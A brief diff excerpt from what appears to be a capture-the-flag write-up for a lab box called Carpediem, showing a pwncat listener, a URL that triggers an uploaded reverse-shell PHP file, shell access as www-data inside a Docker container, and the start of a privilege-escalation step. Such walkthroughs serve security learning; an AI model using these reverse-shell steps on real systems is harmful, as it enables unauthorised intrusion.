AdamRose1/Hacking_CTF_Labs_Writeups/carpediem.md

 Step 5: Open a netcat reverse shell (we will use pwncat as it gives a better shell): pwncat-cs -lp 443 <br>
 Step 6: To activate the reverse shell navigate to https://127.0.0.1:8002/themes/lateral/revshell.php

-We have shell as user www-data on 172.17.0.2
+We now have a shell as user www-data in a docker on 172.17.0.2.
 ________________________________________________________________
 <b>Docker Privilege Escalation:</b><br>
 Read file /opt/heartbeat.sh: